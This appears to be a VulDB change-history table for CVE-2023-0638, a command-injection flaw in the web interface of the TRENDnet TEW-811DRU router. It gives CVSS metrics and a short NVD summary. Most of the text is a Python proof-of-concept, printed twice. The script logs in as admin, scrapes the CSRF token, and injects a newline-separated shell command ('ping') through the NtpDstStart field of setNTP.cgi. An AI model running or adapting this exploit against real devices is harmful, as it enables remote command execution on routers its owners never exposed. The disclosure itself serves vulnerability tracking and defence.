Campo | 02/02/2023 09h09 | 02/02/2023 09h10 | 01/03/2023 16h39 |
---|
vendor | TRENDnet | TRENDnet | TRENDnet |
name | TEW-811DRU | TEW-811DRU | TEW-811DRU |
version | 1.0.10.0 | 1.0.10.0 | 1.0.10.0 |
component | Web Interface | Web Interface | Web Interface |
cwe | 77 (direitos alargados) | 77 (direitos alargados) | 77 (direitos alargados) |
risk | 2 | 2 | 2 |
cvss3_vuldb_av | N | N | N |
cvss3_vuldb_ac | L | L | L |
cvss3_vuldb_pr | H | H | H |
cvss3_vuldb_ui | N | N | N |
cvss3_vuldb_s | U | U | U |
cvss3_vuldb_c | H | H | H |
cvss3_vuldb_i | H | H | H |
cvss3_vuldb_a | H | H | H |
cvss3_vuldb_e | P | P | P |
cvss3_vuldb_rc | R | R | R |
availability | 1 | 1 | 1 |
publicity | 1 | 1 | 1 |
cve | CVE-2023-0638 | CVE-2023-0638 | CVE-2023-0638 |
responsible | VulDB | VulDB | VulDB |
date | 1675292400 (02/02/2023) | 1675292400 (02/02/2023) | 1675292400 (02/02/2023) |
cvss2_vuldb_av | N | N | N |
cvss2_vuldb_ac | L | L | L |
cvss2_vuldb_au | M | M | M |
cvss2_vuldb_ci | C | C | C |
cvss2_vuldb_ii | C | C | C |
cvss2_vuldb_ai | C | C | C |
cvss2_vuldb_e | POC | POC | POC |
cvss2_vuldb_rc | UR | UR | UR |
cvss2_vuldb_rl | ND | ND | ND |
cvss3_vuldb_rl | X | X | X |
cvss2_vuldb_basescore | 8.3 | 8.3 | 8.3 |
cvss2_vuldb_tempscore | 7.1 | 7.1 | 7.1 |
cvss3_vuldb_basescore | 7.2 | 7.2 | 7.2 |
cvss3_vuldb_tempscore | 6.5 | 6.5 | 6.5 |
cvss3_meta_basescore | 7.2 | 7.2 | 7.2 |
cvss3_meta_tempscore | 6.5 | 6.5 | 6.5 |
price_0day | $0-$5k | $0-$5k | $0-$5k |
language | | Python | Python |
sourcecode | | import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://0.0.0.0:8081',
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
login_header = {'Host': '0.0.0.0:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
time.sleep((3-loop)*3)
print('error:{}'.format(e))
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
pass | import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://0.0.0.0:8081',
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
login_header = {'Host': '0.0.0.0:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
time.sleep((3-loop)*3)
print('error:{}'.format(e))
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
pass |
cve_assigned | | | 1675292400 (02/02/2023) |
cve_nvd_summary | | | A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220018 is the identifier assigned to this vulnerability. |